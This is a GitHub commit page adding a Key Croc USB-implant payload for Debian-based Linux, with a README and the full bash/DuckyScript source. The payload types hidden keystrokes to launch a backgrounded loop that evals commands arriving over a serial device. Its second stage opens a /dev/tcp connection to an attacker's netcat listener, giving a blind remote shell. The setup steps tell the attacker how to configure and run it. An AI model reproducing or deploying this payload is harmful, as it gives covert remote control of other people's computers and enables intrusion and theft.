Merge pull request #65 from TW-D/lin_blind-serial-command-injection

"Linux" Blind Serial Command Injection
pull/66/head
Peaks 2024-07-17 15:57:04 -04:00 committed by GitHub
commit 11f9b8d53a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 189 additions and 0 deletions

View File

@ -0,0 +1,65 @@
# "Linux" Blind Serial Command Injection
- Title: "Linux" Blind Serial Command Injection
- Author: TW-D
- Version: 1.0
- Target: Debian-Based Linux Distributions
- Category: Remote Access
- Attackmodes: HID then SERIAL
## Description
Allows a remote attacker to execute commands on a Linux system via a serial connection,
without receiving feedback on the results of the commands.
![schema](./readme_files/schema.png "schema")
__Note :__ *The target user must belong to the "dialout" group.*
```bash
target@target-computer:~$ groups
target@target-computer:~$ sudo usermod --groups dialout --append "${USER}"
```
## Configuration
From the file "lin_blind-serial-command-injection.txt" change the value of the following constants :
```
######## INITIALIZATION ########
readonly REMOTE_HOST="192.168.0.X"
readonly REMOTE_PORT="4444"
[...]
######## SETUP ########
LED SETUP
export DUCKY_LANG="us"
```
## Trigger
>
> Not applicable because of matchless payload
>
## Usage
1. Edit "config.txt" on the Key Croc in "Arming Mode" to specify the WiFi network name and
the associated password.
2. Then place the file "lin_blind-serial-command-injection.txt" in the "payloads/" directory.
3. Eject the Key Croc safely and then start, for example, "netcat" listening on the port
you specified in the REMOTE_PORT constant.
```bash
hacker@hacker-computer:~$ nc -lnvvp 4444
[...]
shell> echo "$(hostname)" > /tmp/output.log
[CTRL + c]
```

View File

@ -0,0 +1,124 @@
#!/bin/bash
#
# Title: "Linux" Blind Serial Command Injection
# Description:
# Allows a remote attacker to execute commands on a Linux system
# via a serial connection, without receiving feedback
# on the results of the commands.
#
# Author: TW-D
# Version: 1.0
# Target: Debian-Based Linux Distributions
# Category: Remote Access
# Attackmodes: HID then SERIAL
#
# TESTED ON
# ===============
# Key Croc 1.4-stable and Ubuntu 22.04.4 LTS
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
#
######## TRIGGER ########
#
# Not applicable because of matchless payload
#
######## INITIALIZATION ########
readonly REMOTE_HOST="192.168.0.X"
readonly REMOTE_PORT="4444"
readonly LOCAL_TTY="/dev/ttyGS0"
######## SETUP ########
LED SETUP
export DUCKY_LANG="us"
######## ATTACK ########
LED ATTACK
ATTACKMODE HID
QUACK CTRL-ALT t
QUACK DELAY 1500
QUACK STRING " nohup \"\${BASH}\" -c '"
QUACK STRING "if groups \"\${USER}\" | grep -qw \"dialout\"; then"
QUACK STRING " default_devices=\"\$(ls /dev/tty* 2> /dev/null)\";"
QUACK STRING " key_croc=\"\";"
QUACK STRING " while true; do"
QUACK STRING " current_devices=\"\$(ls /dev/tty* 2> /dev/null)\";"
QUACK STRING " while IFS= read -r device; do"
QUACK STRING " if ! grep -qF \"\${device}\" <<< \"\${default_devices}\"; then"
QUACK STRING " key_croc=\"\${device}\";"
QUACK STRING " break 2;"
QUACK STRING " fi;"
QUACK STRING " done <<< \"\${current_devices}\";"
QUACK STRING " sleep 1;"
QUACK STRING " done;"
QUACK STRING " while IFS= read -r line; do"
QUACK STRING " if [[ -n \"\${line}\" ]]; then"
QUACK STRING " payload=\$(echo \"\${line}\" | grep -oP \"(?<=<payload>).*?(?=</payload>)\");"
QUACK STRING " if [[ -n \"\${payload}\" ]]; then"
QUACK STRING " eval \"\${payload}\";"
QUACK STRING " fi;"
QUACK STRING " fi;"
QUACK STRING " done < \"\${key_croc}\";"
QUACK STRING " fi"
QUACK STRING "' &> /dev/null &"
QUACK DELAY 250
QUACK ENTER
QUACK DELAY 1000
QUACK STRING " disown && exit"
QUACK DELAY 250
QUACK ENTER
######## STAGE2 ########
LED STAGE2
ATTACKMODE SERIAL
if [ -e "${LOCAL_TTY}" ]; then
exec 3<>/dev/tcp/${REMOTE_HOST}/${REMOTE_PORT}
while true; do
if echo -n "shell> " >&3; then
if read -r payload <&3; then
echo "<payload>${payload}</payload>" > "${LOCAL_TTY}"
else
break
fi
else
break
fi
done
exec 3<&-
exec 3>&-
fi
######## CLEANUP ########
LED CLEANUP
sync
######## FINISH ########
LED FINISH
ATTACKMODE OFF
######## OFF ########
LED OFF
shutdown -h now

Binary file not shown.

After

Width:  |  Height:  |  Size: 58 KiB